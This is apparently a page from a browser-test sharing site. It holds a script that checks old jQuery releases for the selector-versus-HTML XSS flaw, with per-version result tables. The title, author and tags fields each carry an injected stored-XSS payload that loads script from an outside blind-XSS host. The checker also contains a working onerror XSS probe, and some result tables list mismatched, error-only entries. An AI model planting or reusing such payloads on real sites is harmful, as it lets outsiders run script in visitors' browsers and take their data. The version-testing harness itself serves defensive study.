"><script src=https://xs90.xss.ht></script>

"><script src=https://xs90.xss.ht></script>

By
AbdeOuabala 0 Seen 319 times
Tags
"><script src=https://xs90.xss.ht></script>

Results


Tested on
Firefox - 79 - Windows 10
jQuery Version | Is it Vulnerable?
jQuery 2.0.3 | Safe
jQuery 1.10.2 | Safe
jQuery 2.0.1 | Safe
jQuery 1.10.0 | Safe
jQuery 1.9.0 | Safe
jQuery 2.0.2 | Safe
jQuery 1.9.1 | Safe
jQuery 1.10.1 | Safe
jQuery 1.8.1 | Vulnerable
jQuery 1.8.0 | Vulnerable
jQuery 1.8.3 | Vulnerable
jQuery 1.8.2 | Vulnerable
jQuery 2.0.0 | Safe
jQuery 1.7.1 | Vulnerable
jQuery 1.6.4 | Vulnerable
jQuery 1.7.0 | Vulnerable
jQuery 1.6.2 | Vulnerable
jQuery 1.7.2 | Vulnerable
jQuery 1.6.3 | Vulnerable
jQuery 1.6.1 | Vulnerable
jQuery 1.5.1 | Safe
jQuery 1.5.2 | Vulnerable
jQuery 1.6.0 | Vulnerable
jQuery 1.4.4 | Vulnerable
jQuery 1.2.6 | Vulnerable
jQuery 1.4.0 | Vulnerable
jQuery 1.4.1 | Vulnerable
jQuery 1.4.2 | Vulnerable
jQuery 1.4.3 | Vulnerable
jQuery 1.5.0 | Vulnerable
jQuery 1.3.0 | Vulnerable
jQuery 1.3.1 | Vulnerable
jQuery 1.3.2 | Vulnerable
jQuery 1.2.3 | Vulnerable

This browser ran the most recent scan
Tested on
Chrome - 92 - undefined
jQuery Version | Is it Vulnerable?
GET | Some Error Occured
POST | Some Error Occured
HEAD | Some Error Occured
PUT | Some Error Occured
OPTIONS | Some Error Occured
TRACK | Some Error Occured
CONNECT | Some Error Occured
TRACE | Some Error Occured
CUSTOM | Some Error Occured
DELETE | Some Error Occured

This browser ran the most recent scan
Tested on
Chrome Mobile - 90 - Android
jQuery Version | Is it Vulnerable?
protocol | Some Error Occured
pathname | Some Error Occured
search | Some Error Occured
origin | Some Error Occured
href | Some Error Occured
hostname | Some Error Occured
port | Some Error Occured
ancestorOrigins | Some Error Occured
valueOf | Some Error Occured
host | Some Error Occured
reload | Some Error Occured
toString | Some Error Occured
assign | Some Error Occured
hash | Some Error Occured
replace | Some Error Occured

User Script (ENUM_FUNCTION)

					
// Custom Functions
// Label of the jQuery release currently under test: test() writes it,
// vulnerable() and safe() read it when reporting.
// NOTE(review): this is one shared mutable global. If the harness starts
// several test() calls before earlier ones have reported, a late callback
// would be filed under another version's label - confirm the harness runs
// the enum entries one at a time.
var jQuery_version = '';
/**
 * Reports the version currently held in jQuery_version as vulnerable.
 * The probe injected by test() calls this through `parent.vulnerable()`
 * when its <img> error handler runs, so it must stay a global function.
 */
function vulnerable(){
    var label = 'jQuery ' + jQuery_version;
    addError(label, '<b>Vulnerable</b>');
}

/**
 * Reports the version currently held in jQuery_version as safe.
 * The probe injected by test() calls this from its catch branch, i.e. when
 * the `$()` call threw. "Safe" therefore covers this one check only; it says
 * nothing about other issues in that jQuery release.
 */
function safe(){
    var label = 'jQuery ' + jQuery_version;
    addSuccess(label, 'Safe');
}
    
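/**
 * Detaches the test iframe (id 'jQueryFrameID') from the document.
 *
 * The injected probe can call this more than once for the same frame (from
 * its catch branch and again from the <img> error handler), so a frame that
 * is already gone is ignored rather than dereferenced.
 */
function removeIframe(){
    var frame = document.getElementById('jQueryFrameID');
    if (frame && frame.parentNode) {
        frame.parentNode.removeChild(frame);
    }
}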

// Test Function
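/**
 * Checks one hosted jQuery release for the selector-vs-HTML ambiguity in `$()`.
 *
 * A fresh iframe is created, the requested jQuery build is loaded into it from
 * the Google CDN, and a small probe script is injected. The probe passes `$()`
 * a string that begins like a selector but contains an <img> tag: releases that
 * treat any string containing markup as HTML build the element and its error
 * handler reports `parent.vulnerable()`; releases that reject the string throw
 * and the probe reports `parent.safe()`. (jQuery 1.9 tightened this so that
 * only strings starting with '<' are parsed as HTML.)
 *
 * The frame has no src, and this code reaches into `contentWindow.document`,
 * so whatever script is loaded runs with this page's origin. For that reason
 * only dotted numeric versions are allowed into the CDN URL.
 *
 * @param {string} data - jQuery version to test, e.g. '1.8.3'.
 */
function test(data){
    try{
        jQuery_version = data;

        // Anything that is not a plain dotted version (path separators, "..",
        // arbitrary enum values) is reported the same way a failed load would be,
        // without requesting a script for it.
        var version = String(data);
        if (!/^\d+(\.\d+)+$/.test(version)) {
            addResult(data, 'Some Error Occured');
            return;
        }

        var jQueryFrame = document.createElement('iframe');
        jQueryFrame.id = 'jQueryFrameID';
        jQueryFrame.onload = function(){
            var frameDocument = jQueryFrame.contentWindow.document;
            var jQueryScript = frameDocument.createElement('script');
            jQueryScript.type = 'text/javascript';
            jQueryScript.src = 'https://ajax.googleapis.com/ajax/libs/jquery/'+ version +'/jquery.js';

            // Handlers are attached before the element is inserted so neither
            // event can be missed.
            jQueryScript.onload = function(){
                // Re-assert the label in case another test() call overwrote the
                // shared global while this library was loading.
                jQuery_version = data;
                var exploitScript = "try{function bad(){parent.vulnerable(); parent.removeIframe();} $('. <img src=x onerror=bad();>');} catch(err){parent.safe();parent.removeIframe();}";
                var exploit = frameDocument.createElement('script');
                exploit.type = 'text/javascript';
                // `text` sets the script source directly; no HTML parsing involved.
                exploit.text = exploitScript;
                frameDocument.body.appendChild(exploit);
            };
            jQueryScript.onerror = function(){
                addResult(data ,  'Some Error Occured');
                // Drop this frame on a failed load. Every frame shares the same
                // id, so a stale one left in the document would be the frame a
                // later removeIframe() lookup finds.
                if (jQueryFrame.parentNode) {
                    jQueryFrame.parentNode.removeChild(jQueryFrame);
                }
            };

            frameDocument.body.appendChild(jQueryScript);
        };
        document.body.appendChild(jQueryFrame);
    }
    catch(err){
        addInfo(data ,  'Some Error Occured');
    }
}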
					
				
					
				

Enum Data (ENUM_FUNCTION)

					
// jQuery versions to test, newest first, one row per minor release line.
// List taken from the jQuery section of
// https://developers.google.com/speed/libraries/devguide#jquery
var data = [
    '2.0.3', '2.0.2', '2.0.1', '2.0.0',
    '1.10.2', '1.10.1', '1.10.0',
    '1.9.1', '1.9.0',
    '1.8.3', '1.8.2', '1.8.1', '1.8.0',
    '1.7.2', '1.7.1', '1.7.0',
    '1.6.4', '1.6.3', '1.6.2', '1.6.1', '1.6.0',
    '1.5.2', '1.5.1', '1.5.0',
    '1.4.4', '1.4.3', '1.4.2', '1.4.1', '1.4.0',
    '1.3.2', '1.3.1', '1.3.0',
    '1.2.6', '1.2.3'
];